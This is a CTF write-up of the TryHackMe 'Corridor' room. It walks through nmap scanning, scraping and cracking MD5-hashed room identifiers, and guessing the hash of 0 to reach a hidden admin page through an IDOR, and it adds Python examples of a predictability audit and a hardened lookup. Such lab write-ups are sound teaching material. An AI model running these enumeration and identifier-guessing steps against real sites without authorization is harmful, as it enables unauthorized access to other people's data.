Corridor CTF | TryHackMe

CTF Writeup / Walkthrough for Corridor | Can you escape the Corridor?

Last updated 1 year ago


IDOR
Web
Security

Let’s add the target IP to our hosts file, /etc/hosts.

I always map the IP to target.local in /etc/hosts so that I don’t have to type the IP address all the time when engaging. For example, in /etc/hosts I have the following:

sudo nano /etc/hosts
## Targets
192.168.1.1 myrouter.local
TARGET_IP target.local

Initial Recon

We will use Nmap and directory enumeration to get an initial overview of the target.

Since we are doing a stealth (SYN) scan, nmap needs raw sockets, so we run it with sudo:

sudo nmap -sCSV -p- -Pn target.local

Command parameter explanation:

-sC : Run the default NSE scripts against every open port nmap finds
-sS : Do a SYN scan (stealth scan), which does not complete the TCP handshake and so is less likely to be logged by the service
-sV : Get the version of the service running on that particular port

-p- : Scan all 65535 TCP ports
-Pn : Treat all hosts as online -- skip host discovery

The following should be the expected output

Nmap scan report for target.local
Host is up (0.16s latency).
Not shown: 65518 closed tcp ports (conn-refused)
PORT      STATE    SERVICE VERSION
80/tcp    open     http    Werkzeug httpd 2.0.3 (Python 3.10.2)
|_http-title: Corridor
7936/tcp  filtered unknown
15239/tcp filtered unknown
20884/tcp filtered unknown
24144/tcp filtered unknown
35478/tcp filtered unknown
39063/tcp filtered vroa
48519/tcp filtered unknown
50423/tcp filtered unknown
51278/tcp filtered unknown
52203/tcp filtered unknown
54695/tcp filtered unknown
56706/tcp filtered unknown
59725/tcp filtered unknown
62079/tcp filtered unknown
63530/tcp filtered unknown
64701/tcp filtered unknown

Let’s see if there are any UDP ports available to us:

sudo nmap -sCSVU -p- -Pn target.local
PORT   STATE         SERVICE VERSION
68/udp open|filtered dhcpc

# It seems that all the other ports are filtered and most of them are not relevant, so let's focus on the one open port
PORT      STATE    SERVICE VERSION
80/tcp    open     http    Werkzeug httpd 2.0.3 (Python 3.10.2)
|_http-title: Corridor

# The service is a Python web application behind Werkzeug's development server;
# not much to exploit in the server itself, it just serves a simple webpage

If we visit target.local, the website consists only of pictures with links, and the link targets look very much like hashes (32 hex characters).

A quick bash one-liner gives us the list of all such hashes on that page:

curl target.local | grep -o 'alt="[a-z0-9]\{32\}"' | awk -F '"' '{print $2}'

# This shall generate the following output
<--
c4ca4238a0b923820dcc509a6f75849b
c81e728d9d4c2f636f067f89cc14862c
eccbc87e4b5ce2fe28308fd9f2a7baf3
--

Let’s check what kind of hash is being used.

Use this tool: Hash Type Identifier - Identify unknown hashes (https://hashes.com/en/tools/hash_identifier)

Attack Phase

Let's use John to crack the hashes (saved to a file named hash), or you can use an online decrypter such as https://hashes.com/en/decrypt/hash

john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5

# We now have a list of numbers from the hashes
<--
1679091c5a880faf6fb5e6087eb1b2dc:6
45c48cce2e2d7fbdea1afc51c7c6ad26:9
8f14e45fceea167a5a36dedd4bea2543:7
--
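The two steps above (pulling the 32-hex-character alt values out of the page and mapping them back to the small integers they are MD5 digests of) can be done in one place. The following is an added example, not code from the original writeup or from the room: it works on a constructed HTML snippet (SAMPLE_HTML) built from the hashes the page lists, and it assumes the integer range -1..1000 is enough to cover the identifiers. The point of the audit function is the defender's finding: if every "opaque" identifier resolves to a small integer, the identifiers are predictable and any gap in the sequence (and the low ids 0, -1 and 1) is reachable by anyone who can guess it.

```python
import hashlib
import re

# Constructed sample of the kind of HTML the writeup describes: image links
# whose alt text is a 32-hex-character MD5 digest (here the digests of 1, 2, 3 and 6).
SAMPLE_HTML = """
<a href="/c4ca4238a0b923820dcc509a6f75849b"><img src="/static/1.png" alt="c4ca4238a0b923820dcc509a6f75849b"></a>
<a href="/c81e728d9d4c2f636f067f89cc14862c"><img src="/static/2.png" alt="c81e728d9d4c2f636f067f89cc14862c"></a>
<a href="/eccbc87e4b5ce2fe28308fd9f2a7baf3"><img src="/static/3.png" alt="eccbc87e4b5ce2fe28308fd9f2a7baf3"></a>
<a href="/1679091c5a880faf6fb5e6087eb1b2dc"><img src="/static/6.png" alt="1679091c5a880faf6fb5e6087eb1b2dc"></a>
"""

# Same pattern as the page's grep: an alt attribute holding exactly 32 hex characters.
HASH_RE = re.compile(r'alt="([0-9a-f]{32})"')


def extract_hashes(html):
    """Return every 32-hex alt value in document order."""
    return HASH_RE.findall(html)


def md5_hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def build_int_table(lo=-1, hi=1000):
    """Map md5(str(i)) -> i for a small integer range (assumed range, adjust as needed)."""
    return {md5_hex(str(i)): i for i in range(lo, hi + 1)}


def resolve(hashes, table):
    """Look each hash up in the table; None means it is not the digest of a small integer."""
    return {h: table.get(h) for h in hashes}


def audit(html, hi=1000):
    """Summarise how predictable the page's identifiers are."""
    hashes = extract_hashes(html)
    resolved = resolve(hashes, build_int_table(-1, hi))
    ints = sorted(v for v in resolved.values() if v is not None)
    unresolved = [h for h, v in resolved.items() if v is None]
    # Gaps in the observed 1..max sequence: objects that exist but are not linked.
    missing = sorted(set(range(1, max(ints) + 1)) - set(ints)) if ints else []
    return {
        "resolved": resolved,
        "ints": ints,
        "unresolved": unresolved,
        "missing": missing,
        "predictable": bool(ints) and not unresolved,
    }


if __name__ == "__main__":
    report = audit(SAMPLE_HTML)
    print("ids seen   :", report["ints"])
    print("gaps       :", report["missing"])
    print("predictable:", report["predictable"])
```

If `predictable` comes back true, the fix is not a stronger hash: any deterministic function of a small integer can be tabulated the same way. The identifier has to be random and the lookup has to check authorization (see the Exploitation section).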

Let’s find the missing number. A simple Python program will find the one value missing from the sequence we recovered:

# Find the missing element of 1..N+1 given N of its values
def findMissing(arr, N):
    # mark which of the values 1..N+1 are present
    temp = [0] * (N + 1)
    for i in range(0, N):
        temp[arr[i] - 1] = 1
    # the single unmarked slot is the missing number
    for i in range(0, N + 1):
        if temp[i] == 0:
            return i + 1

def MissingNo(arr):
    # sum of 1..n+1 minus the sum of what we have;
    # integer division keeps the result an int (14, not 14.0)
    n = len(arr)
    total = (n + 1) * (n + 2) // 2
    arr_sum = sum(arr)
    return total - arr_sum

# Driver code: the numbers recovered from the cracked hashes
if __name__ == '__main__':
    arr = [6, 9, 7, 4, 1, 2, 8, 5, 3, 11, 12, 13, 10]
    N = len(arr)
    print(MissingNo(arr))

    # Alternative function call
    # print(findMissing(arr, N))

We have 14 as the output, so let's convert it to an MD5 hash:

echo -n "14" | md5sum | awk '{print $1}'

# the following is the output 
aab3238922bcc25a6f606eb525ffdc56

Delivery Phase

Let’s use the hash in the URL

curl http://target.local/aab3238922bcc25a6f606eb525ffdc56

We seem to hit a dead end here 😞

To get past this, let's try the hash of 0 or -1. A common pattern in IDOR vulnerabilities is that the admin account's id is 0, -1 or 1.

Let's hash 0 with MD5:

echo -n 0 | md5sum | awk '{print $1}'

# the following output is generated
cfcd208495d565ef66e7_redacted

# Let us append that to the URL of our target
http://target.local/cfcd208495d565_redacted

Exploitation

Now visit the URL you got: http://target.local/cfcd208495d565_redacted

We should now have the flag : REDACTED_FLAG
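What made this work is that the room tokens were MD5 digests of small integers and the server returned any room whose token it recognised, without asking who was requesting it. The following is an added example, not the room's code or anything from the original writeup: it models both patterns as plain Python functions over a constructed ROOMS table (no web framework, so it runs offline). `vulnerable_lookup` mirrors the weak design; `secure_lookup` shows the two changes that close the hole, an unguessable random token per object (`secrets.token_urlsafe`) and a server-side ownership check on every request. The user names and room contents are constructed sample data.

```python
import hashlib
import secrets

# Constructed sample data: rooms keyed by their integer id, each with an owner.
ROOMS = {
    0: {"owner": "admin", "content": "admin room"},
    1: {"owner": "alice", "content": "room 1"},
    2: {"owner": "bob", "content": "room 2"},
}


def md5_hex(s):
    return hashlib.md5(s.encode()).hexdigest()


# --- Vulnerable pattern -------------------------------------------------
# The URL token is md5(str(id)). Anyone can tabulate these, and the handler
# returns whatever room the token names without an authorization check.
VULN_INDEX = {md5_hex(str(i)): i for i in ROOMS}


def vulnerable_lookup(token, _user):
    room_id = VULN_INDEX.get(token)
    if room_id is None:
        return None
    return ROOMS[room_id]["content"]  # no check of who is asking


# --- Hardened pattern ---------------------------------------------------
# A random, unguessable token per room (issued server-side, e.g. when the
# room is created) plus an ownership check on every lookup.
SECURE_INDEX = {}  # token -> room id


def issue_token(room_id):
    token = secrets.token_urlsafe(32)  # 256 bits of randomness, cannot be tabulated
    SECURE_INDEX[token] = room_id
    return token


def secure_lookup(token, user):
    room_id = SECURE_INDEX.get(token)
    if room_id is None:
        return None
    room = ROOMS[room_id]
    # Authorization: only the owner (or the admin role) may read the room.
    # Return the same "not found" result as for an unknown token so the
    # response does not reveal whether the object exists.
    if user != room["owner"] and user != "admin":
        return None
    return room["content"]


if __name__ == "__main__":
    guessed = md5_hex("0")  # the token the writeup derived for id 0
    print("vulnerable, guessed token as bob:", vulnerable_lookup(guessed, "bob"))
    print("secure, guessed token as bob    :", secure_lookup(guessed, "bob"))
    admin_token = issue_token(0)
    print("secure, real token as bob       :", secure_lookup(admin_token, "bob"))
    print("secure, real token as admin     :", secure_lookup(admin_token, "admin"))
```

Note that the random token alone is not enough: if a user can obtain a token (a shared link, a log entry), the ownership check is what still stops them, and the ownership check alone is not enough either if tokens are predictable and the policy has any gaps. Both together are the usual IDOR mitigation.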

Thanks for reading, hope you learned something new 😎
